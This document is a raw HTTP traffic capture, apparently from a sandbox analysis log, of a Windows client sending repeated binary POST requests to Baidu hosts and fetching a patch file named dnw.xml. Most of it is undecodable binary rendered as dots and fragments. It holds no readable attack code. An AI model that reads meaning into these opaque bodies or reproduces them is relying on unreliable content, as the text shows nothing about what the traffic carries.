Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z.......-" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...(...St..T.aYH`f.7....s......`cw.:(....Y....
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z.......," b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......id..=.
.k.p.~LV..HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicat
ion/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Cont
ent-Length: 150.....z.......," b58974f666e28edaba3814768157053d(......
...28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]
...` ......id..=..k.p.~LV......



GET /client1/common/patch/24946961047/dnw.xml HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 200 OK
Expires: Thu, 04 Dec 2014 15:53:14 GMT
Date: Tue, 04 Nov 2014 15:53:14 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 165
Last-Modified: Mon, 07 Jul 2014 15:29:21 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 137687
Via: 1.0 zhjzh55:8080 (Cdn Cache Server V2.0), 1.0 tswt79:8104 (Cdn Cache Server V2.0), 1.0 jg13:1080 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="dnw.xml"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
..}..a.Pr.DN...R.x.,....*[email protected]=gJbC.z....M..Z.A .A....[........
oh.*Fi:....ki.c1...(.(3:...5..........}.,.U>...{{...... .]k/".}*D.?
>a.#c..3.....[..9..r#.u|`.....



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d([email protected]...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ........



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...(.......2o.i.n&....t..eL..o;r..m....wIn
..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......$.3.`.
..%...K.....



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 212
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...x.......
" b58974f666e28edaba3814768157053d(.........28..7
....K.d.....Zv..S....(,.6.2...C....b.K....{[email protected].` ...P. y.u/)...s5.....d[....DP.)....[....)....~VtR#.R........UeN<.f!Li.......XZ..6r.[#POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 212
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...x........" b58974f666e28edaba3814768157053d(.........28..7
....K.d.....Zv..S....(,.6.2...C....b.K....{[email protected].` ...P.,m............V.3...E9%.:A..y1...k.z4.
.LO....`..?.?....\......bR?....'w.....O..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 148
...x........" b58974f666e28edaba3814768157053d(.........28..7......K.d
.....Zv..S....(,.6.2...C....b.K....{[email protected].` ..... 6...|...
...q.g].HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applicatio
n/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Conten
t-Length: 148.....x........" b58974f666e28edaba3814768157053d(........
.28..7......K.d.....Zv..S....(,.6.2...C....b.K....{[email protected].`
 ..... 6...|......q.g].HTTP/1.1 200 OK..Server: iYuntianSvr..Content-T
ype: application/octet-stream..Keep-Alive: timeout=30..Connection: Kee
p-Alive..Content-Length: 148.....x........" b58974f666e28edaba38147681
57053d(.........28..7......K.d.....Zv..S....(,.6.2...C....b.K....{....
[email protected].` .....,Il./.6E..$wZ....HTTP/1.1 200 OK..Server: iYuntia
nSvr..Content-Type: application/octet-stream..Keep-Alive: timeout=30..
Connection: Keep-Alive..Content-Length: 148.....x........" b58974f666e
28edaba3814768157053d(.........28..7......K.d.....Zv..S....(,.6.2...C.
...b.K....{[email protected].` .....,Il./.6E..$wZ......



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ........X.....#[email protected]....
...Qx...r=NZ.S...e........{.|..V.%..].Y.;fd<
C.....ZWA...%...Lh4y....A:?.n...C.s7..u..rb.. *.'yzL..'..^'....z.
 .
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..../.P.
..F..#...A.M}.!..9..$....)ms6W..-8...Q..7.../....g.H...e.,HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..../.P...F..
#...A.M}.!..9..$....)ms6W..-8...Q..7.../....g.H...e.,....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......V..w.{.....0I.....KF(....l..L
"M.k..q..m\i..kPX......9Ud8CD.x.).G.P_.G
7(..9....^....1 XH'uK.I..DX.j..R|......... .VZ6...#.u9m..f...]~...K3>>.5.s q...0:h.qT:.....52.. ..5Y.P$.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]
..'5..k.....7<...y.HTiL..<.L..(.b3L.j`........I.4...==$K..HTTP/1
.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream
..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.
....z........" b58974f666e28edaba3814768157053d(.........28e..kYN.....
...;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]
D..'5..k.....7<...y.HTiL..<.L..(.b3L.j`........I.4...==$K..t>....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ........A..\dU..5d.HBr%........p.D'....~....^..I.F.3.z7..QoL...TW.I ...P..
...8..A...0..E...VR..\[......'....a...R.L.F.m..e.VQ....1.......6....U%
.....G..Xk...q.A..m......k.br...1..e
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]
...v...b..L..q......,............=.sn..x..>K..H.;l..2.ITD.HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]..
.v...b..L..q......,............=.sn..x..>K..H.;l..2.ITD.....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......
.K.20.8../dQy.xC.B...s..;W\..Do&.
hCT....@!.........ks...*...t{IY,
.{?.....zC.\"T/~P..X(.m.p..lu........1)&......n..p88..W.
&...k......
..v3.......S.....Z..R.i3..[..}..9..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].....
..AG...'.'......nmz..C.g.Sik?4r.2#Bx...R...~.......|.....>HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].......
AG...'.'......nmz..C.g.Sik?4r.2#Bx...R...~.......|.....>....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 302
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......%........ ...s..=
..qSL...*.....^wkz?...V....Z..%.i_Ks...P.Y.O...,'...t..<....6...$K.nwH..H@S~...3J/Z........B...wK{R...d.t..{.0.I.4HM..\.M(....F9..B.o..}3....W.L.....
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]..
C....<n....d..6.#....N.7..F.w.!,2.....W....h.6...(.,.....;HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].
...<n....d..6.#....N.7..F.w.!,2.....W....h.6...(.,.....;....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......Z...2Wa...."h.j..
.[t0.J.....4...../k..H-..Y.,J...5.W>e<../.2.p.ir [email protected]...[7c!......#.....PA"1L....A........v..7.e`..O._/C.F..#v.......!..p.`y.3y.".....8.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].
.T.N.....J^k..........i...:X.,(E.M.B.2N.}..-;...2..j.-Q...HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].
....J^k..........i...:X.,(E.M.B.2N.}..-;...2..j.-Q.......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ........g.*s..S.yn..!...Zo#.RHI3.oY.......fg>....F.J[.gt....<|\Z.yn...'.
.....n..ui
8i|'.V._.. .b...>...?X........D.D......t37..R.O....`.M...k._Y.s....65.0..u.^..... ;.4....=.h#..tR
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@...^....
....h"..r....2....'....3.]..#..L.^..@C|.f.^ ..R...Ss.M....HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@...^........h
"..r....2....'....3.]..#..L.^..@C|.f.^ ..R...Ss.M........


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .........?.@..
...}.HH........M...._...^.W.c.o.....i..!....Co..3e..M.
. ...:.g.LG..c2xY
 ...
.7]IJ ...[~&../..-.Y...F.e.j.2|nx.u.<&....e.r. .8#..w..3.]..n...N..n.(.x,......B...fj
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].
..]....U......8 ...|.c..38do..../.R.x.3.k;.....T......h<..HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]...
]....U......8 ...|.c..38do..../.R.x.3.k;.....T......h<......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ........%.......e=.....2a...?.....q.h.>..X...7..1........(.nb...,....w..Dl...J.%...m.&z.%.U....(.3)WD.uc F2 0......D:rz..Bv{.....m...1.Jl..i.....6.q.|...._....=..|[email protected](.T...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....&.M.
].N.......M..vkv5...]].G.... .......=.........p.C."P<...H.HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....&.M.].
N.......M..vkv5...]].G.... .......=.........p.C."P<...H.....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......u......p...&q.yAg .......b...~...."n.^..W.Jr.#El.v.9..
]Pb ....O.lF.MH..C..I.\...F..r..d...s$....6.w....tj.EGT...Q:.U 8...6.k...(.u...M.D)7........N..)..~*...(..Y....Q..8.....
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected],V.$.
...\....{..q....C...)x.&..;..M.q..H.........V}a3^.s.....).HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected],V.$....\.
...{..q....C...)x.&..;..M.q..H.........V}a3^.s.....).....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 302
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
..
" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......?>S.bG...R......'J.E.....R;...|%. ....*/...xs.B.Z..<}..O.... [email protected]%'...T..X Q....0.......8.~.&&...`a...,..A...<..A.YY..jwK......A.n.'..Q.h......Nd.....
W
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]
.8DQ....B.q.WA...b....i.(\Uw....9.&.\D.].....a.;.Y1.....wuHTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected].
...B.q.WA...b....i.(\Uw....9.&.\D.].....a.;.Y1.....wu....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...............]E...:.._ .?.....n....}...0e`e....5?'....cVN....h.. ...5;.JP....=-...A .|.&R.&.'<.Zi....2............
...m..#E!.~.-...(...Y.B......(..1.....S\...../..L.=......{UT../..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..$ ..B.
....o.>.v......!...pU.,<AzpW...m.'[email protected]/1
.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream
..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.
....z........" b58974f666e28edaba3814768157053d(.........28e..kYN.....
...;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..$ ..B
.....o.>.v......!...pU.,<AzpW...m.'[email protected].t>....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
..." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......rI.7R3...lM;Y.x......y......y?ubL.?-
v.
.b...O..1/.I.TA}..T.`..K....GptD.P.t..qH).....7..x..E...&..s.......
..Il.].L..Y....U.....OLX.}...,1`E..Q$..<. N`d.f......H;...4.`2..o
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@.... ..t
..'.....$..E@z_.....Q.......>n.....4...Tl.}.M.9....;......HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@.... ..t..
'.....$..E@z_.....Q.......>n.....4...Tl.}.M.9....;..........


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...
" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......&.;P...Z&V_{e..9..!..Fx.....$..."..0..N........p....%M.......}..J......~...Y...tbxg....~. I..h.1...#.~%r........oY.z..e.QZ...$..$..)wiW:..6B..4..O....U(?8...]5....;s*....k..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....:...
J>Q.-k..{...w....c...5.p(t.k..*.o#*..k[./.N)k..b]...q.....HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....:...J&
gt;Q.-k..{...w....c...5.p(t.k..*.o#*..k[./.N)k..b]...q.........


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......z.t#b....e..W...3!.e.Irw..%..6.....d..NO4......rP..k*.....A.........ilq??B.4.; .V".D'.2....UQ..vI.f[.g..z...,u...a.,O...&.z......u.......d..y....O....m{.g...........x..}
.z;.G
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@..&....6
...;.y.......i%.7...%.G..=......2g.q.b.9.....H..4.63?.........


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .........5h.J.|SAq.?E......hT$t....m...U..uE..B...1.....4..Ry)..... ..5...-.~B./........x!...q.Ck..=.....B......a.k..v..Ow."4."...8.A!..G v.C9dx....,..........Xf...Se.H!../.*c...5.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@...!...S
}[email protected]......{.~T..a..X.#.y.I....G[v.H"......3.nV3.;...HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@...!...S}.@7.
C...c......{.~T..a..X.#.y.I....G[v.H"......3.nV3.;.......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......m....;A..C.K
..j.{... 6..o....H..*Q..5....!....CW.?....A...w..%.)[email protected]..%._|.R.B...3.....].#....... ..
x....;4.....x^.e....P=........d$10.(r./.L`.$..2.. w...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]...
V{.B.rD.G..=.F.0.8..J..W......*z... b....Z"e.....".<..~#a.HTTP/1.1 
200 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..K
eep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198....
.z........" b58974f666e28edaba3814768157053d(.........28e..kYN........
;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]{
.B.rD.G..=.F.0.8..J..W......*z... b....Z"e.....".<..~#a.....


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......~.P3.*....h<T.z%..........nA.....
%..<K..{..[....(.7.z.......gy98).....$Oi....G..b..lI.}..V......~....,*(....._...s.#\^...v.5....p .)._k.....h......X.......3..:......,k.....
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]...
...\.A..u....p.i.....;......!%...g.q{[email protected]#2-,z...HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` [email protected]......\.
A..u....p.i.....;......!%...g.q{[email protected]#2-,z.......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ......T`...j#.?..Z..d.).gS...........Y%...y(.
..13.Q..5..
e9...>Z_./82.Fbp.......
.&...O.=...[..#
..S....3.<....6t..W)]F.]..........9pz>.....~. .8c....%^..>[email protected]....:|d ....>.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....;%i.
v....\..#..I..n~.~....D.e.{..=..?.....e..4... W.?.^p\.v...HTTP/1.1 200
 OK..Server: iYuntianSvr..Content-Type: application/octet-stream..Keep
-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 198.....z.
......." b58974f666e28edaba3814768157053d(.........28e..kYN........;..
.nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...@....;%i.v....
\..#..I..n~.~....D.e.{..=..?.....e..4... W.?.^p\.v.......


POST / HTTP/1.1


Connection: Keep-Alive
Content-Length: 310
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z..
...." b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` .......>...].)q...".....b  ...>......0K.....9a.C.C.--.I.bf...}Q.....a.s..[...q.E......._
.._m..._.`o.Q....w.Ce9o...z.X..=.%.$...y.......N..V.04*..Cu4..^.V.........RK.1C>.Y.:.....N.:.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
